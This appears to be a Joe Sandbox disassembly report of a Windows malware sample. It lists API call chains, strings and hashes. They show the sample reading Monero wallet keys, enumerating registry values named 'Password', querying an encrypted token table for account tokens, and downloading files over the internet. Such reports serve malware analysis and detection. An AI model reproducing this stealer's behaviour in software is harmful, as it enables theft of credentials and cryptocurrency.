                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D493C0: GlobalAlloc.KERNEL32(00000000,00D443DD,00D443DD), ref: 00D493D3
                  • StrStrA.SHLWAPI(?,00AFE3B0), ref: 00D443F3
                  • GlobalFree.KERNEL32(?), ref: 00D44512
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                    • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                    • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00D444A3
                  • StrCmpCA.SHLWAPI(?,00D508D1), ref: 00D444C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D444D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00D444E5
                  • lstrcat.KERNEL32(00000000,00D50FB8), ref: 00D444F4
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 34205433318de4909283ce669156eec3527ad351be2faba8f0801898e2cef981
                  • Instruction ID: 7b9b23505f912a128e2be82a59fee6a7b2f406cd1914de87d92562374c07d89e
                  • Opcode Fuzzy Hash: 34205433318de4909283ce669156eec3527ad351be2faba8f0801898e2cef981
                  • Instruction Fuzzy Hash: B57146B6900208ABDB14FBA4DC95FEE7779EB88300F044598F60997181DA74DB49DFB2
                  APIs
                    • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                    • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                    • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                    • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                    • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                  • lstrlen.KERNEL32(?), ref: 00D3135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 069bbd38c5c30f020fff4711cfd92b3dc9762c7edd829272e00dcb76176c87eb
                  • Instruction ID: 934bf4653c6c9ac7fbd65f98ecac3d92280a9c02ac1d47b2a3f9449a044fd196
                  • Opcode Fuzzy Hash: 069bbd38c5c30f020fff4711cfd92b3dc9762c7edd829272e00dcb76176c87eb
                  • Instruction Fuzzy Hash: 065121B19901195BDB15FB64DD92BED733CEF54304F404598B60AA2082EE706B8ACFB6
                  APIs
                    • Part of subcall function 00D372D0: memset.MSVCRT ref: 00D37314
                    • Part of subcall function 00D372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                    • Part of subcall function 00D372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                    • Part of subcall function 00D372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                    • Part of subcall function 00D372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                    • Part of subcall function 00D372D0: HeapFree.KERNEL32(00000000), ref: 00D37459
                  • lstrcat.KERNEL32(00000000,00D517FC), ref: 00D37606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D37648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00D3765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D3768F
                  • lstrcat.KERNEL32(00000000,00D51804), ref: 00D376A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D376D3
                  • lstrcat.KERNEL32(00000000,00D51808), ref: 00D376ED
                  • task.LIBCPMTD ref: 00D376FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                  • Instruction ID: d065a23e2726e6dbd8d1f511213f5da41ddef5b2133168077adee27f917abe36
                  • Opcode Fuzzy Hash: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                  • Instruction Fuzzy Hash: 9E314DB2900209DFCB54EBE4DC96DEE7775EB88302F144118F516A7290DA34A986EB72
                  APIs
                  • memset.MSVCRT ref: 00D37314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                  • HeapFree.KERNEL32(00000000), ref: 00D37459
                  • task.LIBCPMTD ref: 00D37555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                  • Instruction ID: 514d193a8e801a48b5a9c13d87f173a6f629f3a229c0a60f3dd8b821bb5ba0a5
                  • Opcode Fuzzy Hash: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                  • Instruction Fuzzy Hash: DA612BB590426C9BDB24DB50CC51BDAB7B8FF48300F0481E9E689A6141DBB06BC9CFB1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00AFE050,00000000,?,00D50E2C,00000000,?,00000000), ref: 00D48130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D48158
                  • __aulldiv.LIBCMT ref: 00D48172
                  • __aulldiv.LIBCMT ref: 00D48180
                  • wsprintfA.USER32 ref: 00D481AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                  • Instruction ID: 877e525ff5400aef074d791fb6aecc1f182bd687c8a8999bce680638bb61de91
                  • Opcode Fuzzy Hash: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                  • Instruction Fuzzy Hash: 6A210BB1E44218ABDB00DFD4CC4AFAEB7B9FB44B54F104509F605BB280D778A9058BB6
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                  • InternetOpenA.WININET(00D50DF7,00000001,00000000,00000000,00000000), ref: 00D3610F
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D3618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D361B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00D361DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36249
                  • InternetCloseHandle.WININET(?), ref: 00D36253
                  • InternetCloseHandle.WININET(00000000), ref: 00D36260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                  • Instruction ID: e75e1048205036c04572065f5237e672b4670246759d32a813b0ab9a8395bd73
                  • Opcode Fuzzy Hash: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                  • Instruction Fuzzy Hash: BD5150B194021CABEB24DF50DC45BEE77B8EB44705F108098B609A71C1DB74AA89DFB6
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00D3BC9F
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00D3BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00D3BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                  • Instruction ID: 27a289a3259ceb67e6dc5e55f6be3076e9db77044a696cfda1f2f93b95af7063
                  • Opcode Fuzzy Hash: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                  • Instruction Fuzzy Hash: 61B15F72950118ABEF04FBA4DC96EEE7338EF54300F414569F506A6092EF346A49CBB2
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                  • Instruction ID: 35a20622ada58213bfd348c63983debaa4334f62f83bb861bd3867b6b44d4494
                  • Opcode Fuzzy Hash: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                  • Instruction Fuzzy Hash: 18F05E3090420DEFD3489FF0E90972C7B70FB45703F050198E60E86690D6748B83ABA7
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D34FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D34FD1
                  • InternetOpenA.WININET(00D50DDF,00000000,00000000,00000000,00000000), ref: 00D34FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35041
                  • InternetCloseHandle.WININET(?), ref: 00D350B9
                  • InternetCloseHandle.WININET(?), ref: 00D350C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: ae5bb0824b9cdbd22b3f41a08550d37c714ff69a2882043030346f761e0f6ec4
                  • Instruction ID: a039eba7441a0c6334cf766fa7e87db06c2b0ca035a2b2372237ccc1e2b23e82
                  • Opcode Fuzzy Hash: ae5bb0824b9cdbd22b3f41a08550d37c714ff69a2882043030346f761e0f6ec4
                  • Instruction Fuzzy Hash: 7C31F8B4A4021CABDB24CF54DC85BDDB7B4EB48704F1081D9FA09A7281D7706EC59FAA
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                  • wsprintfA.USER32 ref: 00D48459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,00AFE080,00000000,000F003F,?,00000400), ref: 00D484EC
                  • lstrlen.KERNEL32(?), ref: 00D48501
                  • RegQueryValueExA.ADVAPI32(00000000,00AFE0C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B34), ref: 00D48599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
